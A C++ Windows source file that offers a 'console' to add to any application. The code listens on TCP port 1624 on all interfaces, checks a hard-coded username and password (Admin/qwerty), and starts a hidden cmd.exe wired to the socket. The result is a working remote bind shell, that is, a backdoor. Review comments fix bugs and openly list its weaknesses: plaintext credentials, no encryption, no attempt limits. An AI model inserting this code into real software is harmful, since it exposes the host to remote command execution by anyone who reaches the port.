////////////////////////////////////////////////////////////////////////////////////
//
// How to Add this console to your App
//
// 1. Add this file to your project
// 2. Define int InitConsole(); in your.cpp
// 3. Call InitConsole() from main() or other func
// 4. Run your.cpp and connect with: telnet your_app_ip SHELL_PORT
// 5. Log in with username Admin and password qwerty (both hard-coded in login())
////////////////////////////////////////////////////////////////////////////////////
#define WIN32_LEAN_AND_MEAN
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
// Public entry point: starts the listener thread once per named event.
int InitConsole();
// Thread entry points. Each one receives a pointer to a SOCKET (Session,
// EndSess) or to a HANDLE (Service) through its LPVOID argument.
//   Session - runs login() and, on success, starts SHELL_NAME with its
//             standard handles set to the socket.
//   Service - binds SHELL_PORT, accepts connections and starts one Session
//             and one EndSess thread per connection.
//   EndSess - closes the socket after a fixed 7500 ms delay.
DWORD WINAPI Session (LPVOID lpParameter);
DWORD WINAPI Service (LPVOID lpParameter);
DWORD WINAPI EndSess (LPVOID lpParameter);
// Username/password prompt over the socket; true only for the built-in pair.
bool login(SOCKET& sendrecv);
// TCP port the listener binds to (on INADDR_ANY, i.e. every local interface).
#define SHELL_PORT 1624
// Command line handed to CreateProcess(). The explicit "\0" is redundant: the
// literal is already NUL-terminated.
// NOTE(review): this is a bare program name, so which executable runs depends
// on CreateProcess()'s search order rather than on a fixed path.
#define SHELL_NAME "cmd\0"
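// Reads one line from `s` into `buf` (capacity `cap` bytes), one byte at a
// time. CR is stored as NUL and LF ends the line, so the result is always a
// NUL-terminated string.
// Returns false on a socket error, when the peer closes the connection
// (recv() returns 0), or when no LF arrives before the buffer is full.
static bool read_login_line(SOCKET s, char *buf, int cap)
{
    memset(buf, 0, cap);
    for (int i = 0; i < cap; i++)
    {
        int nReceived = recv(s, &buf[i], 1, 0);
        if (nReceived == SOCKET_ERROR || nReceived == 0) return false;
        if (buf[i] == 0x0d) buf[i] = 0x00;
        if (buf[i] == 0x0a) { buf[i] = 0x00; return true; }
    }
    // The line did not fit: reject it instead of handing strcmp() a buffer
    // that has no terminator.
    buf[cap - 1] = 0x00;
    return false;
}

// Prompts the peer for a username and a password over `sendrecv` and compares
// them with the credential pair compiled into this file.
//
// Returns true only when both lines were received completely and match.
// Returns false on a socket error, when the peer disconnects, or when a line
// is too long for its 16-byte buffer.
//
// Fixes relative to the earlier version:
//   - the password loop cleared uname[i] instead of pwd[i] on LF, so an
//     LF-only line ending left the LF inside the password and could truncate
//     the username;
//   - a 16-byte line without LF left the buffer unterminated before strcmp();
//   - recv() returning 0 (peer closed) was not treated as a failure;
//   - the prompts were sent with their trailing NUL byte.
//
// NOTE(review): the credentials are string literals in the binary and the
// exchange is unencrypted, so they are recoverable from the executable or
// from the wire. strcmp() is not a constant-time comparison, and nothing here
// limits repeated attempts.
bool login(SOCKET& sendrecv)
{
    static const char user_prompt[] = "\r\nUsername: ";
    static const char pass_prompt[] = "Password: ";
    char uname[16];
    char pwd[16];
    bool ok = false;

    memset(pwd, 0, sizeof(pwd));
    send(sendrecv, user_prompt, (int)(sizeof(user_prompt) - 1), 0);
    if (read_login_line(sendrecv, uname, (int)sizeof(uname)))
    {
        send(sendrecv, pass_prompt, (int)(sizeof(pass_prompt) - 1), 0);
        if (read_login_line(sendrecv, pwd, (int)sizeof(pwd)))
        {
            ok = !strcmp(uname, "Admin") && !strcmp(pwd, "qwerty");
        }
    }
    // Do not leave the typed password on the stack after the check.
    SecureZeroMemory(pwd, sizeof(pwd));
    return ok;
}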
// Thread entry point that acts as a fixed timer on one connection: it copies
// the SOCKET that `sr` points to, waits 7500 ms, then closes this process's
// handle to it. The close happens whether or not login() has finished.
// Always returns 0.
DWORD WINAPI EndSess(LPVOID sr)
{
    // Take the value immediately; `sr` refers to storage owned by the caller.
    SOCKET *slot = static_cast<SOCKET *>(sr);
    const SOCKET victim = *slot;
    const DWORD delay_ms = 7500;

    Sleep(delay_ms);
    closesocket(victim);
    return 0;
}
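// Thread entry point for one accepted connection. Copies the SOCKET that `sr`
// points to, runs login() on it and, only if login() succeeds, starts
// SHELL_NAME with stdin, stdout and stderr set to that socket and with a
// hidden window. Always returns 0.
//
// Changes relative to the earlier version:
//   - the process and thread handles returned by CreateProcess() are closed
//     instead of leaked on every successful login;
//   - the command line is passed in a writable buffer rather than as a string
//     literal, because the parameter is a non-const string pointer;
//   - the SECURITY_ATTRIBUTES local was filled in but never passed anywhere
//     and has been dropped.
//
// NOTE(review): bInheritHandles is TRUE, so the child receives every
// inheritable handle of the host process, not only the socket. The child is
// created by plain CreateProcess(), so it runs with the host process's
// security context, and all traffic on the socket is unencrypted.
DWORD WINAPI Session(LPVOID sr)
{
    SOCKET sendrecv = *((SOCKET*)sr);
    if (!login(sendrecv))
    {
        return 0;
    }

    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdInput = (HANDLE)sendrecv;
    si.hStdOutput = (HANDLE)sendrecv;
    si.hStdError = (HANDLE)sendrecv;

    char cmdline[] = SHELL_NAME;
    if (CreateProcess(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
    {
        // The child keeps running; only this process's references are released.
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    return 0;
}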
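// Listener thread. Initialises Winsock, binds a TCP socket to SHELL_PORT on
// INADDR_ANY and, for every accepted connection, starts one Session thread
// and one EndSess thread that both receive a pointer to the accepted SOCKET.
//
// Returns 0 after the accept loop ends, or 1 when Winsock start-up, socket
// creation, bind() or listen() fails.
//
// Changes relative to the earlier version:
//   - every set-up call is checked; previously a failed bind() (for example
//     when the port was already in use) made accept() fail immediately and
//     the loop created two threads per iteration without end;
//   - a failed accept() no longer starts threads on INVALID_SOCKET;
//   - thread handles are closed instead of leaked;
//   - sockaddr_in is zeroed before use;
//   - `lpParameter` is no longer dereferenced: the value was copied into a
//     local that nothing read, and the pointer refers to storage owned by the
//     caller.
//
// NOTE(review): both worker threads are given the address of the loop-local
// `sendrecv`. They copy the value when they start, but nothing guarantees
// they do so before the next accept() overwrites it; fixing that needs a
// per-connection allocation that Session/EndSess release.
// NOTE(review): INADDR_ANY exposes the port on every interface of the host.
DWORD WINAPI Service(LPVOID lpParameter)
{
    (void)lpParameter;

    WSADATA data;
    if (WSAStartup(MAKEWORD(2, 0), &data) != 0)
    {
        return 1;
    }

    SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
    if (sock == INVALID_SOCKET)
    {
        WSACleanup();
        return 1;
    }

    struct sockaddr_in sock_addr;
    memset(&sock_addr, 0, sizeof(sock_addr));
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons(SHELL_PORT);
    sock_addr.sin_addr.s_addr = INADDR_ANY;

    if (bind(sock, (struct sockaddr*)&sock_addr, sizeof(sock_addr)) == SOCKET_ERROR ||
        listen(sock, 10) == SOCKET_ERROR)
    {
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    while (true)
    {
        struct sockaddr_in sendrecv_addr;
        // accept() overwrites the length, so it is reset for every call.
        int lun = sizeof(sendrecv_addr);
        SOCKET sendrecv = accept(sock, (struct sockaddr*)&sendrecv_addr, &lun);
        if (sendrecv == INVALID_SOCKET)
        {
            // A reset of one pending connection is not fatal to the listener;
            // any other error ends the loop rather than spinning on it.
            if (WSAGetLastError() == WSAECONNRESET) continue;
            break;
        }

        DWORD dwThread;
        HANDLE hSession = CreateThread(NULL, 0, Session, &sendrecv, 0, &dwThread);
        HANDLE hTimer = CreateThread(NULL, 0, EndSess, &sendrecv, 0, &dwThread);
        if (hSession == NULL && hTimer == NULL)
        {
            // Nobody owns the connection, so close it here.
            closesocket(sendrecv);
        }
        if (hSession != NULL) CloseHandle(hSession);
        if (hTimer != NULL) CloseHandle(hTimer);
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}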
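// Starts the console listener once. A named event, "console_already_inited",
// is used as the single-instance marker: if it already exists the function
// does nothing.
//
// Returns 0 when the Service thread was started, -1 when the event already
// existed, could not be created, or the thread could not be started.
//
// Changes relative to the earlier version:
//   - the event handle lives in static storage, because its address is handed
//     to the Service thread and a stack local would be gone once this
//     function returns;
//   - the duplicate handle is closed on the "already exists" path instead of
//     being leaked;
//   - CreateEvent() and CreateThread() failures are reported as -1 instead of
//     being ignored;
//   - the thread handle is closed after start-up.
int InitConsole()
{
    static HANDLE hevt = NULL;

    HANDLE created = CreateEvent(NULL, FALSE, FALSE, TEXT("console_already_inited"));
    // Read the error code before any other API call can overwrite it.
    DWORD err = GetLastError();
    if (created == NULL)
    {
        return -1;
    }
    if (err == ERROR_ALREADY_EXISTS)
    {
        CloseHandle(created);
        return -1;
    }
    // Kept open on purpose: the event has to exist for as long as the
    // listener is running.
    hevt = created;

    DWORD dwThread;
    HANDLE worker = CreateThread(NULL, 0, Service, &hevt, 0, &dwThread);
    if (worker == NULL)
    {
        // Release the marker so a later call can try again.
        CloseHandle(hevt);
        hevt = NULL;
        return -1;
    }
    CloseHandle(worker);
    return 0;
}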